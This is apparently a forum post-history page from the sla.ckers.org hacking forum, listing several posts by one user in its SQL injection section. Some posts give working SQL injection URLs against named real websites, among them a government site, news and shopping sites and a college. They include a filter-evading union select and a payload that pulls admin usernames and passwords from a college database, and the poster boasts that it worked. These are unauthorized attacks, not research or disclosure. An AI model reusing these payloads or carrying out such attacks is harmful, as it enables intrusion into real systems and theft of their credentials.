Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Current Page: 1 of 1
Results 1 - 6 of 6
2 years ago
SunTzu
http://www.vlada.hr/design/vlada2/dtv/index.php?q=zagreb'+and+1=1+/*!uNioN*/+select+all+1,2,3,4,5,6,7+--+ can't bypass it -.-' any ideas?
Forum: SQL and Code Injection
2 years ago
SunTzu
2. alo.rs
hi guys. i could use a bit of help with this. does anyone have any ideas on how to bypass this php custom filter? http://www.alo.rs/resources/templates/tools/print.php?id=45356
Forum: SQL and Code Injection
2 years ago
SunTzu
man good job on the tool. it helped a lot.
Forum: Projects
2 years ago
SunTzu
did you try bypassing with php.ini ?
Forum: Full Disclosure
2 years ago
SunTzu
http://www.kupindo.com/pretraga.php?Pretraga=&fv=99&Grupa=322'
Forum: SQL and Code Injection
2 years ago
SunTzu
Hi, i am a little drunk right now. but i managed to do this injection hell ya. So from my experience there is always another file on the CMS that's vulnerable so i didn't do a sqli on the one u gave. http://www.cgc.edu.in/photoserve.php?thumb=-478+and+1=1+union+select+all+1,2,3,group_concat(USERNAME,char(58),APASSWORD)+from+adminusr http://www.cgc.edu.in/photoserve.php?thumb=-478+and+1=1+un
Forum: SQL and Code Injection
Current Page: 1 of 1